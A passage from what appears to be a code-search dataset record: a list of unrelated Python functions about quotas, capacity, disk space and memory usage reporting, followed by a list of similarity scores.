None\n return\n try:\n data = self._cmd(\"GETQUOTAROOT\", self._encode_mbox_name(mailbox),\n responses=[\"QUOTAROOT\", \"QUOTA\"])\n except ImapError:\n data = None\n finally:\n if data is None:\n self.quota_limit = self.quota_current = None\n return\n\n quotadef = data[1][0].decode()\n m = re.search(r\"\\(STORAGE (\\d+) (\\d+)\\)\", quotadef)\n if not m:\n print(\"Problem while parsing quota def\")\n return\n self.quota_limit = int(m.group(2))\n self.quota_current = int(m.group(1))\n try:\n self.quota_usage = (\n int(float(self.quota_current) / float(self.quota_limit) * 100)\n )\n except TypeError:\n self.quota_usage = -1", "def printSchedule(self):\n\t\tself.printWaiting()\n\t\tprint ' '.join(map(format,range(20),['2' for _ in range(20)]))\n\t\tprint \"\"", "def get_report_as_text(self, **kwargs) -> str:\n\n storage_requirement, used_yard_capacity_over_time = \\\n self._get_used_yard_capacity_based_on_storage_requirement(kwargs)\n\n if used_yard_capacity_over_time:\n used_yard_capacity_sequence = list(used_yard_capacity_over_time.values())\n maximum_used_yard_capacity = max(used_yard_capacity_sequence)\n average_used_yard_capacity = statistics.mean(used_yard_capacity_sequence)\n stddev_used_yard_capacity = statistics.stdev(used_yard_capacity_sequence)\n else:\n maximum_used_yard_capacity = average_used_yard_capacity = 0\n stddev_used_yard_capacity = -1\n\n # create string representation\n report = \"\\n\"\n report += \"storage requirement = \" + self._get_storage_requirement_representation(storage_requirement) + \"\\n\"\n report += \" (reported in TEU)\\n\"\n report += f\"maximum used yard capacity: {maximum_used_yard_capacity:>10.1f}\\n\"\n report += f\"average used yard capacity: {average_used_yard_capacity:>10.1f}\\n\"\n report += f\"standard deviation: {stddev_used_yard_capacity:>10.1f}\\n\"\n report += \"(rounding errors might exist)\\n\"\n return report", "def nice(self):\n print(self.getName(), \":\", self.getLen())", "def get_usage(self):\n return self.box_usage", "def test_read_cluster_resource_quota(self):\n pass", "def print_me(self, tabs=0, tab=' '):\n pre = tab*tabs\n print(pre+'Producer:')\n print(pre+' produces:', self._produces)\n print(pre+' consumes:', self._consumes)\n print(pre+' transfer:', self._transfer)\n print(pre+' capacity:', self._capacity)", "def test_project_allocation_scale_precision(self):\n all_timecards = client().get(\n reverse('TimecardList'),\n kwargs={'date': '2021-09-01'}).data\n\n full_allocation_timecard = all_timecards[0]\n three_quarter_allocation_timecard = all_timecards[1]\n half_allocation_timecard = all_timecards[2]\n one_quarter_allocation_timecard = all_timecards[3]\n one_eighth_allocation_timecard = all_timecards[4]\n\n self.assertEqual(full_allocation_timecard['project_allocation'], \"1.000\")\n self.assertEqual(three_quarter_allocation_timecard['project_allocation'], \"0.750\")\n self.assertEqual(half_allocation_timecard['project_allocation'], \"0.500\")\n self.assertEqual(one_quarter_allocation_timecard['project_allocation'], \"0.250\")\n self.assertEqual(one_eighth_allocation_timecard['project_allocation'], \"0.125\")", "def get_logdb_quota():\n query = {\n \"type\": \"op\",\n \"cmd\": \"<show><system><logdb-quota></logdb-quota></system></show>\",\n }\n\n return __proxy__[\"panos.call\"](query)", "def prog(log=False):\n s = os.statvfs('//')\n sectorSize=s[0]\n sectorTotal=s[2]\n sectorFree=s[3]\n percentage = '{0:.2f} %'.format(sectorFree/sectorTotal*100)\n if (log):\n print('■ Micropython FLASH')\n print(' Sector : {0} Bytes'.format(s[0]))\n print(' Total : {0} Sectors, {1:.4f} MB'.format(s[2],sectorSize*sectorTotal/1048576))\n print(' Free : {0} Sectors, {1:.4f} MB'.format(s[3],sectorSize*sectorFree/1048576))\n print(' Free % : {0}'.format(percentage))\n print()\n return sectorSize*sectorFree", "def disk():\n run(env.disk_usage_command % env)", "def test_create_cluster_resource_quota(self):\n pass", "def total_sdram_requirements(self):", "def tablespace_abs(self, name):\n sql = '''SELECT tablespace_name \"TABLESPACE\", \n round((tablespace_size - used_space) * 8192, 2) \"BYTES\" \n FROM dba_tablespace_usage_metrics \n WHERE tablespace_name = '{0}' '''.format(name)\n self.cur.execute(sql)\n res = self.cur.fetchall()\n for i in res:\n print(i[1])", "def get_capacity():\n fs.get_capacity()", "def print_heap(self):\n print self.queue[:self.size:]", "def print_progress(self):\n print(\n '\\rE {} S {} TR {:6.2f} G {:6.2f} Loss {:6.5f} AvgQ {:6.2f}'\n ' MinR {:6.2f} MaxR {:6.2f}'.format(\n self.episode, self.episode_step,\n self.tracker.total_reward, self.tracker.discounted_rewards,\n self.loss_val, self.total_max_q / self.episode_step,\n self.tracker.min_reward, self.tracker.max_reward,\n end=\"\"))", "def __str__(self):\n result = \"\"\n for i in range(len(self.__buckets)):\n result += \"Bucket \" + str(i) + \": \" + str(len(self.__buckets[i])) + \":\"\n result += str(self.__buckets[i]) + \"\\n\"\n return result", "def print_distribution(genome_amounts):\n\t\tassert isinstance(genome_amounts, list)\n\t\tcounter = Counter(genome_amounts)\n\t\ttext = \"{sep}\".join([\"{}: {}\".format(counter[k], k) for k in counter]).format(sep=os.linesep)\n\t\tprint(\"{sep}Using {genoms} original genomes.{sep}<#genomes>: <#strains>{sep}{counter}\".format(\n\t\t\tgenoms=len(genome_amounts), counter=text, sep=os.linesep))", "def usage_quota(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"usage_quota\")", "def get_used_capacity(self,tot=\"50\"):\n data=self.at_cmd(\"CPMS?\")\n index=data[1].find(tot)-1\n if data[1][index-1]==',':\n return data[index]\n else:\n return data[1][index-1:index]", "def print_max_sizes(self):\n print(\"max_sizes: %s\" % self.max_sizes)", "def mem_info(self):\n\t\t\tavailable, total = cuda.mem_get_info() #Note: pycuda._driver.LogicError: cuMemGetInfo failed: context is destroyed\n\t\t\tprint(\"Available: %.2f GB\\nTotal: %.2f GB\"%(available/1e9, total/1e9))", "def current_capacity_range(self):\n done, data = self._request('GC')\n if done:\n return int(data[0]), int(data[1])\n\n raise EvseError", "def test_list_namespaced_applied_cluster_resource_quota(self):\n pass", "def print_data():\n print \"quantity1.value %f\" % 10.0\n return 0", "def print_self(self):\n #print(f\"\\nself: \\nN: {self.N} \\nQ: {self.Q} \\npi: {self.pi}\"); \n s = ''\n s += f'N: {self.N}, \\n'\n s += f'Q: {self.Q:.2f}, \\n'\n s += f'U: {self.U:2.3f}\\n'\n s += f'policy: ' + ' '.join(f\"{x:2.3f}\" for x in self.pi)\n print(s)\n self.env.render()", "def get_send_quota(self):\r\n return self._make_request('GetSendQuota')", "def get_cgts_vg_free_space():\n\n try:\n # Determine space in cgts-vg in GiB\n vg_free_str = subprocess.check_output( # pylint: disable=not-callable\n ['vgdisplay', '-C', '--noheadings', '--nosuffix',\n '-o', 'vg_free', '--units', 'g', 'cgts-vg'],\n close_fds=True, universal_newlines=True).rstrip()\n cgts_vg_free = int(float(vg_free_str))\n except subprocess.CalledProcessError:\n LOG.error(\"Command vgdisplay failed\")\n raise Exception(\"Command vgdisplay failed\")\n\n return cgts_vg_free", "def ufree(verbose=False):\n import gc\n import os\n F = gc.mem_free()\n A = gc.mem_alloc()\n T = F+A\n P = '{0:.2f}%'.format(F/T*100)\n if not verbose:\n return P\n return ('Total: {} Free: {} ({})'.format(T ,F, P))", "def get_printable_size(self):\n size = self.size\n prefix = ''\n for (s, l) in [(1024*1024*1024, 'GB'), (1024*1024, 'MB'), (1024, 'KB')]:\n if (size>s):\n size = float(size)/s\n prefix = l\n\n return '%10.2f %s' % (size, prefix)", "def zfs_quota(jzfs_path, jquota):\n if jquota == 'none':\n os.system(\"zfs set quota=%s %s\" % (jquota, jzfs_path))\n else:\n# check if zfs set quota is correct\n if os.WEXITSTATUS(os.system(\"zfs set quota=%s %s\" % (jquota, jzfs_path))) != 0:\n print \" \"\n print \" WARNING: Incorrect zfs quota!\"\n else:\n return False", "def view_budgets(self) -> None:\n Menu.prompt_view_budgets()\n for budget in self.user.budget_manager:\n print(f\"{budget}\\n\")", "def assignTaskQuotasGet(self, request, context, org_params,\n page_name, params, entity, **kwargs):\n\n from soc.modules.ghop.views.models.organization import view as org_view\n \n logic = params['logic']\n program_entity = logic.getFromKeyFieldsOr404(kwargs)\n \n org_params['list_template'] = ('modules/ghop/program/'\n 'allocation/allocation.html')\n org_params['list_heading'] = ('modules/ghop/program/'\n 'allocation/heading.html')\n org_params['list_row'] = 'modules/ghop/program/allocation/row.html'\n org_params['list_pagination'] = 'soc/list/no_pagination.html'\n org_params['list_description'] = self.DEF_TASK_QUOTA_ALLOCATION_MSG\n# TODO(LIST)\n\n return self.list(request, 'any_access', page_name=page_name, params=org_params)", "def print_available( self ):\n\n\t\tmax_length = 0\n\n\t\tfor key in self._available:\n\t\t\tmax_length = max( max_length, len( key ) )\n\n\t\tformat_str = 'API found: %%-%ds (%%s)' % max_length\n\n\t\tfor key in self._available:\n\t\t\tentry = self._available.get( key )\n\t\t\tprint( format_str % ( key, entry.get( 'path' ) ) )", "def report_quota_for_vserver(vs_host, dlimits):\n quota_free = 1000 * (dlimits[1] - dlimits[0])\n quota_used = 1000 * dlimits[0]\n submit_vserver_quota(vs_host, 'quota', [quota_used, quota_free])", "def ram(log=False):\n gc.collect()\n freeRam = gc.mem_free()\n allocatedRam = gc.mem_alloc()\n totalRam = freeRam+allocatedRam\n percentage = '{0:.2f} %'.format(freeRam/totalRam*100)\n if (log):\n print('■ Micropython RAM')\n print(' Total : {0:.2f} KB'.format(totalRam/1024))\n print(' Free : {0:.2f} KB'.format(freeRam/1024))\n print(' Free % : {0}'.format(percentage))\n print()\n return freeRam", "def __str__(self):\n return \"{}, {}km on current fare, ${:.2f}/km\".format(super().__str__(),\n self.current_fare_distance,\n self.price_per_km)", "def __repr__(self) -> str:\n return \"capacity of hash: {}, current size of hash: {}\".format(\n self.capacity, self.length\n )", "def capacity(self):\n return str(int(self._properties.get('capacity')) * 1073741824)", "def usage_metrics(self) -> Sequence['outputs.GetServiceQuotaUsageMetricResult']:\n return pulumi.get(self, \"usage_metrics\")", "def test_replace_cluster_resource_quota(self):\n pass", "def display(self):\n print(\n f'\\t\\t {self.name.upper()} {self.potency[0]}{self.potency[1]}\\t\\t'\n f' {self.dose_qty[0]} {self.dose_qty[1]} {self.dose[0]} {self.dose[1].upper()}')", "def gather_info_and_display():\n # Obtain total rss displayed in memory.stat for each group,\n # container and service.\n try:\n output_mem = pipe_command(GREP_CMD, AWK_CMD, cwd=MEMPATH)\n LOG.debug(\n 'command: %s\\n%s',\n \"grep -rs total_rss '/sys/fs/cgroup/memory/' \"\n \"| awk '$2>0{print$0}' \",\n output_mem)\n except subprocess.CalledProcessError as error:\n LOG.error('Could not get total_rss memory, error=%s', error)\n return 1\n\n mem_info = get_meminfo()\n pt_groups = gather_groups_memory(output_mem)\n pt_cont = gather_containers_memory(output_mem)\n pt_serv = sys_service_memory()\n\n # Dump the tables out\n print('\\nPer groups memory usage:')\n\n # Get string to be printed and create list of elements separated by \\n\n list_of_table_lines = pt_groups.get_string().split('\\n')\n\n # Use the first line (+---+-- ...) as horizontal rule to insert later\n horizontal_line = list_of_table_lines[0]\n\n # Print the table, except last two lines ( \"Total\" row + final separator).\n print(\"\\n\".join(list_of_table_lines[:-2]))\n # Print separator, and finally the \"Total\" row.\n print(horizontal_line)\n print(\"\\n\".join(list_of_table_lines[-2:]))\n\n pt_namespc = prettytable.PrettyTable(\n ['Namespace',\n 'Resident Set Size (MiB)',\n ], caching=False)\n pt_namespc.align = 'l'\n pt_namespc.align['Resident Set Size (MiB)'] = 'r'\n\n print('\\nPer namespace memory usage:')\n for n_s in MEMORY['namespaces']:\n pt_namespc.add_row(\n [n_s,\n MEMORY['namespaces'][n_s],\n ])\n print(pt_namespc)\n\n print('\\nPer container memory usage:')\n print(pt_cont)\n\n print('\\nPer service memory usage:')\n print(pt_serv)\n\n base_mebib = 0.0\n k8s_system = 0.0\n k8s_addon = 0.0\n platform_memory_percent = 0.0\n\n # Calculate base memory usage (i.e., normal memory, exclude K8S and VMs)\n # e.g., docker, system.slice, user.slice\n for group in MEMORY['cgroups']:\n if group in BASE_GROUPS:\n base_mebib += float(MEMORY['cgroups'][group])\n\n # K8S platform system usage (essential) and addons usage (non-essential)\n for n_s in MEMORY['namespaces']:\n if n_s in K8S_NAMESPACE_SYSTEM:\n k8s_system += MEMORY['namespaces'][n_s]\n elif n_s in K8S_NAMESPACE_ADDON:\n k8s_addon += MEMORY['namespaces'][n_s]\n\n # Calculate platform memory usage\n platform_mebib = base_mebib + k8s_system\n\n anon_mebib = float(mem_to_mebibytes(\n mem_info['Active(anon)'] + mem_info['Inactive(anon)'])) * KBYTE\n avail_mebib = float(mem_to_mebibytes(\n mem_info['MemAvailable'])) * KBYTE\n total_mebib = float(anon_mebib + avail_mebib)\n\n anon_percent = py2_round(100 * anon_mebib / total_mebib, DECIMAL_DIGITS) # pylint: disable=W1619\n\n reserved_mebib = get_platform_reserved_memory()\n # Calculate platform memory in terms of percent reserved\n if reserved_mebib > 0.0:\n platform_memory_percent = py2_round(\n 100 * platform_mebib / reserved_mebib, DECIMAL_DIGITS) # pylint: disable=W1619\n\n pt_platf = prettytable.PrettyTable(\n ['Reserved',\n 'Platform',\n 'Base',\n 'K8s Platform system',\n 'k8s-addon'\n ], caching=False)\n pt_platf.align = 'l'\n\n pt_platf.add_row(\n [reserved_mebib,\n '{} ({}%)'.format(platform_mebib, platform_memory_percent),\n base_mebib,\n k8s_system,\n k8s_addon\n ])\n print('\\nPlatform memory usage in MiB:')\n print(pt_platf)\n\n pt_4k = prettytable.PrettyTable(\n ['Anon',\n 'Cgroup-rss',\n 'Available',\n 'Total'\n ], caching=False)\n pt_4k.align = 'l'\n\n pt_4k.add_row(\n ['{} ({}%)'.format(anon_mebib, anon_percent),\n MEMORY['cgroups']['total_rss'],\n avail_mebib,\n total_mebib\n ])\n\n print('\\n4K memory usage in MiB:')\n print(pt_4k)\n\n return 0", "def get_usage(self):\n res = self.conn.get_send_quota()\n res = res['GetSendQuotaResponse']\n result = res['GetSendQuotaResult']\n quota = float(result['Max24HourSend'])\n sent = float(result['SentLast24Hours'])\n return sent, quota", "def value_printer():#todo: add all wanted items\n print(\"Max ascent speed = \"+ max_ascent_speed() + \" m/s\")\n print(\"Max ascent acceleration = \" + ascent_acc() + \" m/s^2\")\n print(\"Max ascent acceleration = \" + descent_acc() + \" m/s^2\")\n print(\"Max acceleration = \" + acc() + \" m/s^2\")", "def get_space(): \n space = {\n 'timesteps_per_batch': hp.choice('timesteps_per_batch', [512, 1024, 2048, 4096, 8192]),\n 'vf_stepsize': hp.loguniform('vf_stepsize', -5, -2),\n 'max_kl' : hp.loguniform('max_kl', -2.5, -0.5),\n 'gamma': hp.uniform('gamma', (1-(1/((10**(-1))*4))), (1-(1/((10**(1.5))*4)))), #4:T. Remember to change this if code is altered. -1:T/tau. tau=0.04=dt\n 'lam': hp.uniform('lam', (1-(1/((10**(-1))*4))), (1-(1/((10**(1.5))*4)))) #4:T. Remember to change this if code is altered. -1:T/tau. tau=0.04=dt\n }\n return space", "def ufree_disk():\n import os\n # note: this would work on PyCom devices but not implemented\n fs_stat = os.statvfs('//')\n fs_size = fs_stat[0] * fs_stat[2]\n fs_free = fs_stat[0] * fs_stat[3]\n fs_per = fs_free / fs_size\n return(\"Total: {:,} Free: {:,} ({0:.2f}%)\".format(fs_size, fs_free, fs_per))", "def freespace(self):\n self.log.info(\"freespace\")\n freebytes = shutil.disk_usage(self.s3_dir).free\n self.log.info(\"returning:\" + str(freebytes))\n return freebytes", "def get_num_slots(self):\n # Your code here\n return self.capacity", "def check_disk_space(self, required_disk_space, fs='/opt'):\n\n stats = admin_tasks.df_stats(fs)\n if stats:\n __, __, available = stats\n\n space_left = available - required_disk_space\n\n if space_left > 0.5:\n self.log.info(\"%.1fG of disk space is available from approximately %.1fG in %s\" %\n (required_disk_space, available, fs))\n elif space_left > 0 and space_left <= 0.5:\n self.log.warning(\"Low disk space. Only %.1fG will be free from approximately available space of %.1fG in %s.\" % (\n space_left, available, fs))\n else:\n self.log.error(\"Not enough disk space. %.1fG is not available from approximately avaiable space of %.1fG in %s.\" % (\n required_disk_space, available, fs))\n sys.exit(1)", "def __printProgressBar (self,iteration, total,size,speedd='n', prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n\t\tpercent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n\t\tfilledLength = int(length * iteration // total)\n\t\tsize='%.1f'%size\n\t\tbar = fill * filledLength + '-' * (length - filledLength)\n\t\tprint('\\r(%sMG) |%s| %s%% [%s]kbs size=[%s]MB %s' % (prefix, bar, percent,speedd,size, suffix), end = '\\r')", "def __str__(self):\n outbuffer = []\n outbuffer.append(\"%d keys in dataset\" % len(self.__quantile))\n outbuffer.append(self.head())\n outbuffer.append(\"...\")\n outbuffer.append(self.tail())\n return \"\\n\".join(outbuffer)", "def test_capacity_factor(pudl_out_eia):\n print(\"\\nCalculating generator capacity factors...\")\n cf = pudl_out_eia.capacity_factor()\n print(f\" capacity_factor: {len(cf)} records\")", "def __str__(self):\n result = \"\"\n for i in range(len(self.__buckets)):\n result += \"Bucket \" + str(i) + \": \" + str(self.__buckets[i]) + \"\\n\"\n return result", "def getSpaceUsage(path):\n st = os.statvfs(path)\n \n flash = { \"free\" : st.f_bavail * st.f_frsize, \"used\":(st.f_blocks - st.f_bfree) * st.f_frsize }\n \n #free = st.f_bavail * st.f_frsize\n #total = st.f_blocks * st.f_frsize\n #used = (st.f_blocks - st.f_bfree) * st.f_frsize\n return flash", "def print_account(account):\r\n markets_output = \"\"\r\n for market in account.get_market_segments():\r\n markets_output += market.name.strip(\"\\'\") + \", \"\r\n markets_output = markets_output.strip(\"\\'\")\r\n print(f'{account.name} ({markets_output[:-2]}): {account.get_sales_rep()}')", "def test_rest_v20_dd_systems_systemid_stats_capacity_get(self):\n pass", "def cpu_k_space_fq_allocation(n, sv, mem):\n return int(math.floor(\n float(.8 * mem - 4 * sv * n - 12 * n) / (4 * (3 * sv + 4))\n ))", "def print_header():\n\n def get_dashes(perc):\n dashes = \"|\" * int((float(perc) / 10 * 4))\n empty_dashes = \" \" * (40 - len(dashes))\n return dashes, empty_dashes\n\n # cpu usage\n percs = psutil.cpu_percent(interval=0, percpu=True)\n for cpu_num, perc in enumerate(percs):\n dashes, empty_dashes = get_dashes(perc)\n line = (\" CPU%-2s [%s%s] %5s%%\" % (cpu_num, dashes, empty_dashes,\n perc))\n print_line(line)\n\n # cpu usage\n mem = psutil.virtual_memory()\n dashes, empty_dashes = get_dashes(mem.percent)\n line = \" Mem [%s%s] %5s%% %6s / %s\" % (\n dashes, empty_dashes,\n mem.percent,\n str(int(mem.used / 1024 / 1024)) + \"M\",\n str(int(mem.total / 1024 / 1024)) + \"M\"\n )\n print_line(line)\n\n # swap usage\n swap = psutil.swap_memory()\n dashes, empty_dashes = get_dashes(swap.percent)\n line = \" Swap [%s%s] %5s%% %6s / %s\" % (\n dashes, empty_dashes,\n swap.percent,\n str(int(swap.used / 1024 / 1024)) + \"M\",\n str(int(swap.total / 1024 / 1024)) + \"M\"\n )\n print_line(line)", "def log_allocation(self, allocation, resource):\n self.log_file.write(self.TYPE_SUCCESS + \",%f,%s,%f,%f,%f,%f\\n\" %\n (float(allocation.resources[resource]['used']),\n allocation.node,\n float(allocation.utilization),\n float(allocation.offer),\n float(allocation.price),\n float(allocation.unit_price)))" ]
[ "0.6803348", "0.6786766", "0.62010103", "0.60411453", "0.60358113", "0.603348", "0.5993506", "0.58677566", "0.58565897", "0.5847982", "0.5795429", "0.57485247", "0.5704235", "0.5681458", "0.5679012", "0.564224", "0.56345713", "0.56312704", "0.56190854", "0.554365", "0.55390847", "0.55081373", "0.54874927", "0.54707724", "0.5461569", "0.5441486", "0.54362214", "0.5429559", "0.5403241", "0.53922236", "0.53888613", "0.5375704", "0.53727657", "0.5359334", "0.53590983", "0.53507644", "0.533257", "0.5318734", "0.53069425", "0.5304192", "0.5303645", "0.5300067", "0.5292556", "0.5292322", "0.52784276", "0.5265859", "0.5262544", "0.525921", "0.52470624", "0.52437526", "0.5239561", "0.5234352", "0.5216176", "0.5205941", "0.51835936", "0.51793486", "0.51740205", "0.5171844", "0.5162029", "0.515867", "0.5151075", "0.5150676", "0.5147505", "0.51450455", "0.51353055", "0.51325214", "0.51318204", "0.51243985", "0.5113366", "0.51126075", "0.509887", "0.5096122", "0.5089727", "0.5086241", "0.5080108", "0.5065954", "0.5065555", "0.506313", "0.5058623", "0.50486326", "0.5048169", "0.50473857", "0.50440055", "0.5043608", "0.5029822", "0.50286436", "0.50164896", "0.50102925", "0.50079536", "0.50069284", "0.5003988", "0.49987933", "0.49976602", "0.49958903", "0.49958497", "0.49935088", "0.49909848", "0.4986983", "0.4973301", "0.49729565" ]
0.6106883
3